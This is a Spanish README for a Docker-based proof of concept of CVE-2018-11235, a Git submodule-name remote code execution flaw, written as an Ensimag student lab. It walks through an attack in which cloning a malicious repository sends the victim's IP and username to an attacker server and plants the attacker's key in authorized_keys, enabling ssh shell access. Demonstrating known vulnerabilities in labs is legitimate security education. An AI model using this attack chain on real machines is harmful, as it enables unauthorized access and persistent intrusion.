
Prueba de concepto - Explotación de RCE : Vulnerabilidad en nombres de submódulos de Git - Ensimag Noviembre de 2018
Para construir los contenedores Docker, use:
make docker
(Los siguientes comandos make deben ejecutarse en paralelo en diferentes terminales desde su máquina)
Para iniciar el contenedor del servidor atacante, use:
make run_server
para iniciar el contenedor que representa a la víctima, use:
make run_client
El contenedor ejecutará el script client.py. El script transmitirá su dirección IP y su nombre de usuario al atacante.
Siga las instrucciones de la consola de los clientes para clonar el repositorio git malicioso.
git clone --recurse-submodules root@server:home/poc/malicious_repo client_pwned
Notará que la dirección IP y el nombre de usuario de la víctima se transmiten al servidor.
Después del clonado, verifique que la clave pública del atacante se haya agregado a authorized_keys del cliente.
Luego, puede abrir un shell en el cliente desde el servidor, con el siguiente comando (ejecutar en su máquina):
make server_bash
ssh <transmitted_username>@<transmitted_host>
Si tiene algún problema al ejecutar este Proof of Concept, por favor cree un issue en este repositorio: https://github.com/ygouzerh/CVE-2018-11235/issues , le responderemos lo más rápido posible.